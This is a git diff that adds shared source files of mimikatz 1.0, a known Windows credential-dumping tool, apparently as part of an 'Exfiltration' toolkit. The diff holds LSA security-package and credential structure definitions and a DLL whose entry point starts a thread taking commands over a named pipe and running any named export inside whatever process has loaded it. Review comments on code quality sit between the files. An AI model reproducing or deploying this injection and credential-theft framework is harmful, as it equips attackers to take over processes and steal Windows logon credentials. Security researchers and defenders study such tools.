Diffstat (limited to 'Exfiltration/mimikatz-1.0/commun')
-rw-r--r--Exfiltration/mimikatz-1.0/commun/globdefs.h128
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.icobin0 -> 1150 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.icobin0 -> 4286 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.icobin0 -> 9662 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.icobin0 -> 15086 bytes
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.cpp139
-rw-r--r--Exfiltration/mimikatz-1.0/commun/kmodel.h21
-rw-r--r--Exfiltration/mimikatz-1.0/commun/secpkg.h239
16 files changed, 527 insertions, 0 deletions
diff --git a/Exfiltration/mimikatz-1.0/commun/globdefs.h b/Exfiltration/mimikatz-1.0/commun/globdefs.h
new file mode 100644
index 0000000..d579a3b
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/globdefs.h
@@ -0,0 +1,128 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#pragma warning(disable:4530)
+#include <stdio.h>
+#include <windows.h>
+#include <ntsecapi.h>
+#include <string>
+#include <vector>
+using namespace std;
+
+#define SECURITY_WIN32
+#define PAGE_SIZE 0x1000
+#define MAX_DOMAIN_LEN 24
+#define MAX_USERNAME_LEN 24
+
+#define MIMIKATZ L"mimikatz"
+#ifdef _M_X64
+ #define MIMIKATZ_FULL L"mimikatz 1.0 x64 (RC)"
+#else ifdef
+ #define MIMIKATZ_FULL L"mimikatz 1.0 x86 (RC)"
+#endif
+
+#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
+#define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1)
+#define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2)
+#define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
+
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L)
+#define STATUS_MORE_ENTRIES ((NTSTATUS)0x00000105L)
+
+#define S_SWAP(a, b) {BYTE t = S[a]; S[a] = S[b]; S[b] = t;}
+
+typedef bool (* PKIWI_LOCAL_COMMAND) (vector<wstring> * arguments);
+
+typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND {
+ PKIWI_LOCAL_COMMAND ptrCommand;
+ wstring commandName;
+ wstring commandHelp;
+ _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name, wstring help) : ptrCommand(command), commandName(name), commandHelp(help) {}
+ _KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(PKIWI_LOCAL_COMMAND command, wstring name) : ptrCommand(command), commandName(name), commandHelp() {}
+} KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND, *PKIWI_MIMIKATZ_LOCAL_MODULE_COMMAND;
+
+typedef struct _KIWI_MIMIKATZ_LOCAL_MODULE {
+ wstring module;
+ wstring description;
+ vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> commandes;
+ _KIWI_MIMIKATZ_LOCAL_MODULE(wstring leModule, wstring laDescription, vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> lesCommandes) : module(leModule), description(laDescription), commandes(lesCommandes) {}
+} KIWI_MIMIKATZ_LOCAL_MODULE, *PKIWI_MIMIKATZ_LOCAL_MODULE;
+
+typedef struct _CLIENT_ID {
+ PVOID UniqueProcess;
+ PVOID UniqueThread;
+} CLIENT_ID, *PCLIENT_ID;
+
+typedef const ULONG CLONG;
+typedef const UNICODE_STRING *PCUNICODE_STRING;
+typedef STRING OEM_STRING;
+typedef PSTRING POEM_STRING;
+typedef CONST STRING* PCOEM_STRING;
+
+/* System* */
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_006) (LPCSTR string, BYTE hash[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_007) (PUNICODE_STRING string, BYTE hash[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_025) (BYTE[16], DWORD *, BYTE[16]);
+typedef NTSTATUS (WINAPI * PSYSTEM_FUNCTION_027) (BYTE[16], DWORD *, BYTE[16]);
+/* CNG */
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_STORAGE_PROVIDER) (__out NCRYPT_PROV_HANDLE *phProvider, __in_opt LPCWSTR pszProviderName, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_ENUM_KEYS) (__in NCRYPT_PROV_HANDLE hProvider, __in_opt LPCWSTR pszScope, __deref_out NCryptKeyName **ppKeyName, __inout PVOID * ppEnumState, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_OPEN_KEY) (__in NCRYPT_PROV_HANDLE hProvider, __out NCRYPT_KEY_HANDLE *phKey, __in LPCWSTR pszKeyName, __in DWORD dwLegacyKeySpec, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_EXPORT_KEY) (__in NCRYPT_KEY_HANDLE hKey, __in_opt NCRYPT_KEY_HANDLE hExportKey, __in LPCWSTR pszBlobType, __in_opt NCryptBufferDesc *pParameterList, __out_opt PBYTE pbOutput, __in DWORD cbOutput, __out DWORD *pcbResult, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_GET_PROPERTY) (__in NCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PBYTE pbOutput, __in DWORD cbOutput, __out DWORD * pcbResult, __in DWORD dwFlags);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_BUFFER) (__deref PVOID pvInput);
+typedef SECURITY_STATUS (WINAPI * PNCRYPT_FREE_OBJECT) (__in NCRYPT_HANDLE hObject);
+typedef NTSTATUS (WINAPI * PBCRYPT_ENUM_REGISTERED_PROVIDERS)(__inout ULONG* pcbBuffer, __deref_opt_inout_bcount_part_opt(*pcbBuffer, *pcbBuffer) PCRYPT_PROVIDERS *ppBuffer);
+typedef VOID (WINAPI * PBCRYPT_FREE_BUFFER) (__in PVOID pvBuffer);
+
+typedef NTSTATUS (WINAPI * PBCRYPT_OPEN_ALGORITHM_PROVIDER) (__out BCRYPT_ALG_HANDLE *phAlgorithm, __in LPCWSTR pszAlgId, __in_opt LPCWSTR pszImplementation, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_SET_PROPERTY) (__inout BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __in_bcount(cbInput) PUCHAR pbInput, __in ULONG cbInput, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_GET_PROPERTY) (__in BCRYPT_HANDLE hObject, __in LPCWSTR pszProperty, __out_bcount_part_opt(cbOutput, *pcbResult) PUCHAR pbOutput, __in ULONG cbOutput, __out ULONG *pcbResult, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYPT_GENERATE_SYMMETRIC_KEY) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __out BCRYPT_KEY_HANDLE *phKey, __out_bcount_full_opt(cbKeyObject) PUCHAR pbKeyObject, __in ULONG cbKeyObject, __in_bcount(cbSecret) PUCHAR pbSecret, __in ULONG cbSecret, __in ULONG dwFlags);
+typedef NTSTATUS (WINAPI * PBCRYTP_DESTROY_KEY) (__inout BCRYPT_KEY_HANDLE hKey);
+typedef NTSTATUS (WINAPI * PBCRYTP_CLOSE_ALGORITHM_PROVIDER) (__inout BCRYPT_ALG_HANDLE hAlgorithm, __in ULONG dwFlags);
+
+/* Rtl* */
+#define RtlEqualLuid(L1, L2) (((L1)->LowPart == (L2)->LowPart) && ((L1)->HighPart == (L2)->HighPart))
+typedef NTSTATUS (WINAPI * PRTL_CREATE_USER_THREAD) (__in HANDLE Process, __in_opt PSECURITY_DESCRIPTOR ThreadSecurityDescriptor, __in char Flags, __in_opt ULONG ZeroBits, __in_opt SIZE_T MaximumStackSize, __in_opt SIZE_T CommittedStackSize, __in PTHREAD_START_ROUTINE StartAddress, __in_opt PVOID Parameter, __out_opt PHANDLE Thread, __out_opt PCLIENT_ID ClientId);
+typedef VOID (WINAPI * PRTL_INIT_STRING) (PSTRING DestinationString, PCSTR SourceString);
+typedef VOID (WINAPI * PRTL_INIT_UNICODESTRING) (PUNICODE_STRING DestinationString, PCWSTR SourceString);
+typedef NTSTATUS (WINAPI * PRTL_UPCASE_UNICODE_STRING_TO_OEM_STRING) (POEM_STRING DestinationString, PCUNICODE_STRING SourceString, BOOLEAN AllocateDestinationString);
+typedef VOID (WINAPI * PRTL_FREE_OEM_STRING) (POEM_STRING OemString);
+typedef PVOID (WINAPI * PRTL_LOOKUP_ELEMENT_GENERIC_TABLE_AV) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
+typedef enum _RTL_GENERIC_COMPARE_RESULTS (WINAPI * PRTL_AVL_COMPARE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID FirstStruct, __in PVOID SecondStruct);
+typedef PVOID (WINAPI * PRTL_AVL_ALLOCATE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in CLONG ByteSize);
+typedef VOID (WINAPI * PRTL_AVL_FREE_ROUTINE) (__in struct _RTL_AVL_TABLE *Table, __in PVOID Buffer);
+
+typedef struct _RTL_BALANCED_LINKS {
+ struct _RTL_BALANCED_LINKS *Parent;
+ struct _RTL_BALANCED_LINKS *LeftChild;
+ struct _RTL_BALANCED_LINKS *RightChild;
+ CHAR Balance;
+ UCHAR Reserved[3];
+} RTL_BALANCED_LINKS;
+typedef RTL_BALANCED_LINKS *PRTL_BALANCED_LINKS;
+
+typedef enum _RTL_GENERIC_COMPARE_RESULTS {
+ GenericLessThan,
+ GenericGreaterThan,
+ GenericEqual
+} RTL_GENERIC_COMPARE_RESULTS;
+
+typedef struct _RTL_AVL_TABLE {
+ RTL_BALANCED_LINKS BalancedRoot;
+ PVOID OrderedPointer;
+ ULONG WhichOrderedElement;
+ ULONG NumberGenericTableElements;
+ ULONG DepthOfTree;
+ PRTL_BALANCED_LINKS RestartKey;
+ ULONG DeleteCount;
+ PRTL_AVL_COMPARE_ROUTINE CompareRoutine;
+ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine;
+ PRTL_AVL_FREE_ROUTINE FreeRoutine;
+ PVOID TableContext;
+} RTL_AVL_TABLE, *PRTL_AVL_TABLE;
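Review bot: The x86 branch of the MIMIKATZ_FULL definition reads `#else ifdef`, which leaves stray tokens after `#else`; MSVC only warns (C4067) while other compilers warn or, in pedantic modes, reject it, so the line should be plain `#else`. `using namespace std;` is placed at global scope in a header that every module includes, so the directive leaks into all of them; `using std::wstring; using std::vector;` or qualified names would keep the header self-contained. `S_SWAP` silently depends on a variable named `S` existing at the expansion site, which is worth stating, e.g. `// requires a BYTE S[] state array in scope at the point of use`, or passing `S` explicitly. Two of the CNG typedefs are spelt `PBCRYTP_DESTROY_KEY` and `PBCRYTP_CLOSE_ALGORITHM_PROVIDER` rather than `PBCRYPT_…`; harmless, but inconsistent with the neighbouring names and easy to miss when grepping.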
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
new file mode 100644
index 0000000..9ac92da
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
new file mode 100644
index 0000000..79edffc
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
new file mode 100644
index 0000000..2285d1c
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/cmd_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
new file mode 100644
index 0000000..745963e
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_bird.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
new file mode 100644
index 0000000..7497143
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
new file mode 100644
index 0000000..07df30f
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/mimikatz_fruit_16.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
new file mode 100644
index 0000000..67b1100
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
new file mode 100644
index 0000000..6d7f787
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
new file mode 100644
index 0000000..805707a
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/regedit_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
new file mode 100644
index 0000000..a1c08e5
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_32.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
new file mode 100644
index 0000000..ea38a48
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_48.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
new file mode 100644
index 0000000..27adde3
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/icons/taskmgr_kiwi.ico
Binary files differ
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.cpp b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
new file mode 100644
index 0000000..a87ea8f
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/kmodel.cpp
@@ -0,0 +1,139 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#include "kmodel.h"
+
+HMODULE g_hModule = NULL;
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+{
+ if (ul_reason_for_call == DLL_PROCESS_ATTACH)
+ {
+ g_hModule = hModule;
+
+ HANDLE hThread = CreateThread(NULL, 0, &ThreadProc, NULL, 0, NULL);
+ if(hThread && hThread != INVALID_HANDLE_VALUE)
+ {
+ return CloseHandle(hThread);
+ }
+ }
+ return TRUE;
+}
+
+DWORD WINAPI ThreadProc(LPVOID lpParameter)
+{
+ mod_pipe * monCommunicator = new mod_pipe(L"kiwi\\mimikatz");
+
+ bool succes = false;
+ for(DWORD nbRetry = 1; nbRetry <= 5 && !succes; nbRetry++)
+ {
+ succes = monCommunicator->createClient();
+ if(!succes)
+ {
+ Sleep(3000);
+ }
+ }
+
+ if(succes)
+ {
+ ptrFunctionString maFonctionString = reinterpret_cast<ptrFunctionString>(GetProcAddress(g_hModule, "getDescription"));
+
+ wstring monBuffer = L"Bienvenue dans un processus distant\n\t\t\tGentil Kiwi";
+ if(maFonctionString)
+ {
+ wstring * maDescription = new wstring();
+ if(maFonctionString(maDescription))
+ {
+ monBuffer.append(L"\n\n");
+ monBuffer.append(*maDescription);
+ }
+ delete maDescription;
+ }
+
+
+
+ if(monCommunicator->writeToPipe(monBuffer))
+ {
+ for(;;)
+ {
+ if(monCommunicator->readFromPipe(monBuffer))
+ {
+ wstring fonction = monBuffer;
+ vector<wstring> arguments;
+
+ size_t monIndex = fonction.find(L' ');
+
+ if(monIndex != wstring::npos)
+ {
+ arguments = mod_parseur::parse(fonction.substr(monIndex + 1));
+ fonction = fonction.substr(0, monIndex);
+ }
+
+ string procDll(fonction.begin(), fonction.end());
+
+ ptrFunction maFonction = reinterpret_cast<ptrFunction>(GetProcAddress(g_hModule, procDll.c_str()));
+
+ if(maFonction)
+ {
+ if(maFonction(monCommunicator, &arguments))
+ {
+ monBuffer = L"@";
+ }
+ else // La fonction à retourné FALSE, il y a donc anomalie bloquante sur le canal
+ {
+ break;
+ }
+ }
+ else
+ {
+ monBuffer = L"@Méthode \'";
+ monBuffer.append(fonction);
+ monBuffer.append(L"\' introuvable !\n");
+ }
+
+ if(!monCommunicator->writeToPipe(monBuffer))
+ {
+ break;
+ }
+ }
+ else
+ {
+ break;
+ }
+ }
+ }
+ }
+
+ delete monCommunicator;
+
+ FreeLibraryAndExitThread(g_hModule, 0);
+ return 0;
+}
+
+bool sendTo(mod_pipe * monPipe, wstring message)
+{
+ wstring reponse = L"#";
+ reponse.append(message);
+
+ return monPipe->writeToPipe(reponse);
+}
+
+
+__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments)
+{
+ bool sendOk = sendTo(monPipe, L"pong");
+
+ for(vector<wstring>::iterator monArgument = mesArguments->begin(); monArgument != mesArguments->end() && sendOk; monArgument++)
+ {
+ wstring maReponse = L" - argument:";
+ maReponse.append(*monArgument);
+ sendOk = sendTo(monPipe, maReponse);
+ }
+
+ if(sendOk)
+ sendOk = sendTo(monPipe, L"\n");
+
+ return sendOk;
+} \ No newline at end of file
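Review bot: In DllMain, `return CloseHandle(hThread);` couples the attach result to closing the thread handle: if CloseHandle fails the loader treats DLL_PROCESS_ATTACH as failed and unmaps the module while the worker thread it just created (which normally cannot get past the loader lock until DllMain returns) still points into it, so the host process crashes. Close the handle and report success unconditionally: `CloseHandle(hThread);` followed by `return TRUE;`. The `hThread != INVALID_HANDLE_VALUE` test is a no-op because CreateThread returns NULL on failure, and `string procDll(fonction.begin(), fonction.end())` narrows each wchar_t to a char, so a non-ASCII command name received on the pipe is looked up under a different export name than the one sent. A comment in ThreadProc would also help the next reader: every export of this module is reachable by name via GetProcAddress from the `kiwi\mimikatz` pipe, so whatever access control mod_pipe applies to that pipe (not visible here) is the only thing gating command execution inside the host process.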
diff --git a/Exfiltration/mimikatz-1.0/commun/kmodel.h b/Exfiltration/mimikatz-1.0/commun/kmodel.h
new file mode 100644
index 0000000..65bd912
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/kmodel.h
@@ -0,0 +1,21 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "globdefs.h"
+#include "mod_pipe.h"
+#include "mod_parseur.h"
+
+#define __kextdll extern "C" __declspec(dllexport)
+
+typedef bool (__cdecl * ptrFunction) (mod_pipe * monPipe, vector<wstring> * mesArguments);
+typedef bool (__cdecl * ptrFunctionString) (wstring * maDescription);
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
+DWORD WINAPI ThreadProc(LPVOID lpParameter);
+
+bool sendTo(mod_pipe * monPipe, wstring message);
+
+__kextdll bool __cdecl ping(mod_pipe * monPipe, vector<wstring> * mesArguments);
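Review bot: `__kextdll` starts with a double underscore, which C++ reserves for the implementation; it works with MSVC today, but a toolchain is free to claim the name. Since the macro is shared by every module that includes this header, renaming is a cross-cutting change, so at least document it: `// Export marker for pipe-dispatched commands: extern "C" keeps the symbol unmangled so GetProcAddress in ThreadProc can resolve it by its plain name.` The two function-pointer typedefs are the contract between the dispatcher and the exports, and the meaning of the bool is not obvious from the header: ThreadProc treats a false return from a `ptrFunction` as a dead channel and leaves its read loop, so a comment such as `// return false only when the pipe is no longer usable; the dispatcher stops on false` on `ptrFunction` would save a trip through kmodel.cpp.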
diff --git a/Exfiltration/mimikatz-1.0/commun/secpkg.h b/Exfiltration/mimikatz-1.0/commun/secpkg.h
new file mode 100644
index 0000000..385307d
--- /dev/null
+++ b/Exfiltration/mimikatz-1.0/commun/secpkg.h
@@ -0,0 +1,239 @@
+/* Benjamin DELPY `gentilkiwi`
+ http://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : http://creativecommons.org/licenses/by/3.0/fr/
+ Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/
+*/
+#pragma once
+#include "globdefs.h"
+#include <sspi.h>
+#include <wincred.h>
+
+typedef struct _KIWI_GENERIC_PRIMARY_CREDENTIAL
+{
+ LSA_UNICODE_STRING UserName;
+ LSA_UNICODE_STRING Domaine;
+ LSA_UNICODE_STRING Password;
+} KIWI_GENERIC_PRIMARY_CREDENTIAL, * PKIWI_GENERIC_PRIMARY_CREDENTIAL;
+
+typedef NTSTATUS (WINAPIV * PLSA_INITIALIZE_PROTECTED_MEMORY) ();
+
+typedef PVOID *PLSA_CLIENT_REQUEST;
+typedef LPTHREAD_START_ROUTINE SEC_THREAD_START;
+typedef LPSECURITY_ATTRIBUTES SEC_ATTRS;
+
+typedef struct _SECPKG_CLIENT_INFO {
+ LUID LogonId; // Effective Logon Id
+ ULONG ProcessID; // Process Id of caller
+ ULONG ThreadID; // Thread Id of caller
+ BOOLEAN HasTcbPrivilege; // Client has TCB
+ BOOLEAN Impersonating; // Client is impersonating
+ BOOLEAN Restricted; // Client is restricted
+ // NT 5.1
+ UCHAR ClientFlags; // Extra flags about the client
+ SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; // Impersonation level of client
+ // NT 6
+ HANDLE ClientToken;
+} SECPKG_CLIENT_INFO, * PSECPKG_CLIENT_INFO;
+
+typedef enum _LSA_TOKEN_INFORMATION_TYPE {
+ LsaTokenInformationNull, // Implies LSA_TOKEN_INFORMATION_NULL data type
+ LsaTokenInformationV1, // Implies LSA_TOKEN_INFORMATION_V1 data type
+ LsaTokenInformationV2 // Implies LSA_TOKEN_INFORMATION_V2 data type
+} LSA_TOKEN_INFORMATION_TYPE, *PLSA_TOKEN_INFORMATION_TYPE;
+
+typedef enum _SECPKG_NAME_TYPE {
+ SecNameSamCompatible,
+ SecNameAlternateId,
+ SecNameFlat,
+ SecNameDN,
+ SecNameSPN
+} SECPKG_NAME_TYPE;
+
+typedef struct _SECPKG_CALL_INFO {
+ ULONG ProcessId;
+ ULONG ThreadId;
+ ULONG Attributes;
+ ULONG CallCount;
+ PVOID MechOid; // mechanism objection identifer
+} SECPKG_CALL_INFO, * PSECPKG_CALL_INFO;
+
+typedef enum _SECPKG_SESSIONINFO_TYPE {
+ SecSessionPrimaryCred // SessionInformation is SECPKG_PRIMARY_CRED
+} SECPKG_SESSIONINFO_TYPE;
+
+typedef struct _SECPKG_PRIMARY_CRED {
+ LUID LogonId;
+ UNICODE_STRING DownlevelName; // Sam Account Name
+ UNICODE_STRING DomainName; // Netbios domain name where account is located
+ UNICODE_STRING Password;
+ UNICODE_STRING OldPassword;
+ PSID UserSid;
+ ULONG Flags;
+ UNICODE_STRING DnsDomainName; // DNS domain name where account is located (if known)
+ UNICODE_STRING Upn; // UPN of account (if known)
+ UNICODE_STRING LogonServer;
+ UNICODE_STRING Spare1;
+ UNICODE_STRING Spare2;
+ UNICODE_STRING Spare3;
+ UNICODE_STRING Spare4;
+} SECPKG_PRIMARY_CRED, *PSECPKG_PRIMARY_CRED;
+
+typedef struct _SECPKG_SUPPLEMENTAL_CRED {
+ UNICODE_STRING PackageName;
+ ULONG CredentialSize;
+#ifdef MIDL_PASS
+ [size_is(CredentialSize)]
+#endif // MIDL_PASS
+ PUCHAR Credentials;
+} SECPKG_SUPPLEMENTAL_CRED, *PSECPKG_SUPPLEMENTAL_CRED;
+
+typedef struct _SECPKG_SUPPLEMENTAL_CRED_ARRAY {
+ ULONG CredentialCount;
+#ifdef MIDL_PASS
+ [size_is(CredentialCount)] SECPKG_SUPPLEMENTAL_CRED Credentials[*];
+#else // MIDL_PASS
+ SECPKG_SUPPLEMENTAL_CRED Credentials[1];
+#endif // MIDL_PASS
+} SECPKG_SUPPLEMENTAL_CRED_ARRAY, *PSECPKG_SUPPLEMENTAL_CRED_ARRAY;
+
+typedef NTSTATUS (WINAPI * PLSA_CALLBACK_FUNCTION) (ULONG_PTR Argument1, ULONG_PTR Argument2, PSecBuffer InputBuffer, PSecBuffer OutputBuffer);
+
+typedef NTSTATUS (WINAPI * PLSA_CREATE_LOGON_SESSION) (IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_DELETE_LOGON_SESSION) (IN PLUID LogonId);
+typedef NTSTATUS (WINAPI * PLSA_ADD_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue, IN PLSA_STRING Credentials);
+typedef NTSTATUS (WINAPI * PLSA_GET_CREDENTIALS) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN OUT PULONG QueryContext, IN BOOLEAN RetrieveAllCredentials, IN PLSA_STRING PrimaryKeyValue, OUT PULONG PrimaryKeyLength, IN PLSA_STRING Credentials);
+typedef NTSTATUS (WINAPI * PLSA_DELETE_CREDENTIAL) (IN PLUID LogonId, IN ULONG AuthenticationPackage, IN PLSA_STRING PrimaryKeyValue);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_LSA_HEAP) (IN ULONG Length);
+typedef VOID (WINAPI * PLSA_FREE_LSA_HEAP) (IN PVOID Base);
+typedef PVOID (WINAPI * PLSA_ALLOCATE_PRIVATE_HEAP) (IN SIZE_T Length);
+typedef VOID (WINAPI * PLSA_FREE_PRIVATE_HEAP) (IN PVOID Base);
+typedef NTSTATUS (WINAPI * PLSA_ALLOCATE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG LengthRequired, OUT PVOID *ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_FREE_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN PVOID ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_COPY_TO_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID ClientBaseAddress, IN PVOID BufferToCopy);
+typedef NTSTATUS (WINAPI * PLSA_COPY_FROM_CLIENT_BUFFER) (IN PLSA_CLIENT_REQUEST ClientRequest, IN ULONG Length, IN PVOID BufferToCopy, IN PVOID ClientBaseAddress);
+typedef NTSTATUS (WINAPI * PLSA_IMPERSONATE_CLIENT) (VOID);
+typedef NTSTATUS (WINAPI * PLSA_UNLOAD_PACKAGE) (VOID);
+typedef NTSTATUS (WINAPI * PLSA_DUPLICATE_HANDLE) (IN HANDLE SourceHandle, OUT PHANDLE DestionationHandle);
+typedef NTSTATUS (WINAPI * PLSA_SAVE_SUPPLEMENTAL_CREDENTIALS) (IN PLUID LogonId, IN ULONG SupplementalCredSize, IN PVOID SupplementalCreds, IN BOOLEAN Synchronous);
+typedef HANDLE (WINAPI * PLSA_CREATE_THREAD) (IN SEC_ATTRS SecurityAttributes, IN ULONG StackSize, IN SEC_THREAD_START StartFunction, IN PVOID ThreadParameter, IN ULONG CreationFlags, OUT PULONG ThreadId);
+typedef NTSTATUS (WINAPI * PLSA_GET_CLIENT_INFO) (OUT PSECPKG_CLIENT_INFO ClientInfo);
+typedef HANDLE (WINAPI * PLSA_REGISTER_NOTIFICATION) (IN SEC_THREAD_START StartFunction, IN PVOID Parameter, IN ULONG NotificationType, IN ULONG NotificationClass, IN ULONG NotificationFlags, IN ULONG IntervalMinutes, IN OPTIONAL HANDLE WaitEvent);
+typedef NTSTATUS (WINAPI * PLSA_CANCEL_NOTIFICATION) (IN HANDLE NotifyHandle);
